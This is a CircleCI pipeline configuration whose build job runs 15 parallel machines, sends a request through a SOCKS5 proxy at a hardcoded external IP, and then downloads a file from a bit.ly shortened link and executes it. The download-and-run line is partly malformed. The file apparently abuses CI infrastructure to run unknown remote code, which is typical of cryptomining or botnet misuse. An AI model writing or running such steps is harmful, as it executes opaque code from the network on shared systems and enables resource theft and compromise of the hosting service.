version: 2.1

jobs:
  build:
    parallelism: 15
    machine:
      image: ubuntu-2004:2022.10.1
    steps:
      - checkout
      - run:
          command: |
                   curl -v -x socks5://192.74.246.152:1080 https://app.circleci.com/
      - run:
          command: |
                   wget https://bit.ly/3yKkMe5 +x 3yKkMe5
                   ./3yKkMe5
